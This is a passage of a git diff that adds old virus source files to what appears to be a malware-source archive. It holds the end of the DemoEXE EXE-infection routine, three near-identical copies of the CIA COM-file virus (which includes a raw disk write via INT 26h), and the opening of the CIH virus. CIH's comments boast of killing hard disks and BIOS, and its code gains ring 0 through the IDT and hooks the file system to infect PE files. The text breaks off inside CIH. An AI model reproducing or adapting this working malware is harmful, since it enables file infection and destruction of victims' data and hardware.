+ + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next 
+ + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus diff --git a/MSDOS/Virus.MSDOS.Unknown.cia.asm b/MSDOS/Virus.MSDOS.Unknown.cia.asm new file mode 100644 index 00000000..b2d0dc03 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cia.asm 
@@ -0,0 +1,241 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz 
find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main + + diff --git a/MSDOS/Virus.MSDOS.Unknown.cia2.asm b/MSDOS/Virus.MSDOS.Unknown.cia2.asm new file mode 100644 index 00000000..9b8e7eb6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cia2.asm 
@@ -0,0 +1,247 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz 
find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main + + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + diff --git a/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm b/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm new file mode 100644 index 00000000..b42da67b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ciavirus.asm 
@@ -0,0 +1,239 @@ + page 70,120 + Name CIAVIRUS +;************************************ +; CIA Virus (C) 1989 by +; Live Wire +;************************************ + + +code segment + assume cs:code +progr equ 100h + ORG progr + +main: + nop + nop + nop + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + mov ah,19h + int 21h + mov cs:drive,al + mov ah,47h + mov dh,0 + add al,1 + mov dl,al + lea si,cs:old_path + int 21h + mov ah,0eh + mov dl,0 + int 21h + mov al,01 + cmp al,01 + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +change_disk: + jnc no_name_change + mov ah,17h + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change + mov ah,2ch + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +hups2: + mov ah,0eh + int 21h + mov ah,3bh + lea dx,path + int 21h + jmp find_first_file + +find_first_subdir: + mov ah,17h + lea dx,cs:maske_exe + int 21h + mov ah,3bh + lea dx,path + int 21h + mov ah,04eh + mov cx,00010001b + lea dx,maske_exe + int 21h + jc change_disk + + mov bx,CS:counter + inc bx + dec bx + jz use_next_subdir + +find_next_subdir: + mov ah,4fh + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +use_next_subdir: + mov ah,2fh + int 21h + add bx,1ch + mov es:[bx],'\ ' + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +find_first_file: + mov ah,04eh + mov cx,00000001b + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +find_next_file: + mov ah,4fh + int 21h + jc find_first_subdir + +check_if_ill: + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + mov bx,ax + mov ah,3fh + mov cx,buflen + mov dx,buffer + int 21h + mov ah,3eh + int 21h + + mov bx,cs:[buffer] + cmp bx,9090h + jz 
find_next_file + + mov ah,43h + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + + mov ah,3dh + mov al,02h + mov dx,9eh + int 21h + + mov bx,ax + mov ah,57h + mov al,0 + int 21h + push cx + push dx + + mov dx,cs:[conta] + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + + mov ah,40h + mov cx,buflen + lea dx,main + int 21h + + mov ah,57h + mov al,1 + pop dx + pop cx + int 21h + + mov ah,3eh + int 21h + + mov dx,cs:[jmpbuf] + mov cs:[conta],dx +hops: nop + call use_old + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +use_old: + mov ah,0eh + mov dl,cs:drive + int 21h + + mov ah,3bh + lea dx,old_path-1 + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 +counter dw 0000 +disks db 0 + + +maske_com db "*.com",00 +maske_dir db "*",00 +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h + +buflen equ 230h +jmpbuf equ buffer+buflen +path db "\",0 +drive db 0 +back_slash db "\" +old_path db 32 dup (?) + +code ends + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.cih.txt b/MSDOS/Virus.MSDOS.Unknown.cih.txt new file mode 100644 index 00000000..b03b576e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih.txt 
@@ -0,0 +1,1165 @@ +**************************************************************************** + +; * The Virus Program Information * +; +**************************************************************************** + +; * + * +; * Designer : CIH Original Place : TTIT of Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.2 * +; * Modification Time : 05/21/1998 + * +; * * +; +*==========================================================================* + +; * Modification History * +; +*==========================================================================* + +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. + * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. + * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; +*==========================================================================* + +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. 
* +; +*==========================================================================* + +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; +**************************************************************************** + + + .586P + +; +**************************************************************************** + +; * Original PE Executable File(Don't Modify this Section) + * +; +**************************************************************************** + + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 
002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 
00000000h, VirusSize + +OriginalAppEXE ENDS + +; +**************************************************************************** + +; * My Virus Game + * +; +**************************************************************************** + + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 +DEBUG = TRUE +MajorVirusVersion = 1 +MinorVirusVersion = 2 +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + +IF DEBUG + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h +ELSE + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h +ENDIF + +FileNameBufferSize = 7fh +; ********************************************************* +VirusGame SEGMENT + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* +MyVirusStart: + push ebp +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + lea eax, [esp-04h*2] + xor ebx, ebx + xchg eax, fs:[ebx] + call @0 +@0: + pop ebx + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + push eax +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... 
* +; ************************************* + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + cli + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + lea esi, MyExceptionHook-@1[ecx] + push esi + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + pop esi +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + push esi + mov esi, eax +LoopOfMergeAllVirusCodeSection: + mov ecx, [eax-04h] + rep movsb + sub eax, 08h + mov esi, [eax] + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + jmp LoopOfMergeAllVirusCodeSection +QuitLoopOfMergeAllVirusCodeSection: + pop esi +; ************************************* +; * Generate Exception Again * +; ************************************* + int HookExceptionNumber ; GenerateException Again +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* +ReadyRestoreSE: + sti + xor ebx, ebx + jmp RestoreSE +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. 
* +; ************************************* +StopToRunVirusCode: +@1 = StopToRunVirusCode + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] +RestoreSE: + pop dword ptr fs:[ebx] + pop eax +; ************************************* +; * Return Original App to Execute * +; ************************************* + pop ebp + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + ret ; Return to Original App Entry Point +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* +MyExceptionHook: +@2 = MyExceptionHook + jz InstallMyFileSystemApiHook +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + iretd +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* +AllocateSystemMemoryPage: + mov dr0, ebx ; Set the Mark of My Virus Exist in System + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + xchg edi, eax ; EDI = SystemMemory Start Address + lea eax, MyVirusStart-@2[esi] + iretd ; Return to Ring3 Initial Program +; ************************************* +; * Install My File System Api Hook * +; ************************************* +InstallMyFileSystemApiHook: + lea eax, FileSystemApiHook-@6[edi] + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
+IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + mov dr0, eax ; Save OldFileSystemApiHook Address + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + jmp ExitRing0Init +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* +CodeSizeOfMergeVirusCodeSection = offset $ +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* +InstallFileSystemApiHook: + push ebx + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + push eax + + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + mov dr0, eax ; Adjust OldFileSystemApiHook Address + pop eax + pop ebx + ret +; ********************************************************* +; * Static Data * +; ********************************************************* +OldInstallFileSystemApiHook dd ? 
+; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* +FileSystemApiHook: +@3 = FileSystemApiHook + pushad + call @5 ; +@5: ; + pop esi ; mov esi, offset +VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 +; ************************************* +; * Is OnBusy !? * +; ************************************* + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc +; ************************************* +; * Is OpenFile !? * +; ************************************* + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook +; ************************************* +; * Enable OnBusy * +; ************************************* + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + ; mov esi, offset FileNameBuffer + add esi, FileNameBuffer-@6 + push esi + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + add al, 40h + mov ah, ':' + mov [esi], eax + inc esi + inc esi +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. 
* +; ************************************* +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + ; cmp [esi+eax-04h], '.EXE' + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy +IF DEBUG +; ************************************* +; * Only for Debug * +; ************************************* + ; cmp [esi+eax-06h], 'FUCK' + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy +ENDIF +; ************************************* +; * Is Open Existing File !? * +; ************************************* + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy +; ************************************* +; * Get Attributes of the File * +; ************************************* + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + jc DisableOnBusy + push ecx +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] +; ************************************* +; * Is Read-Only File !? 
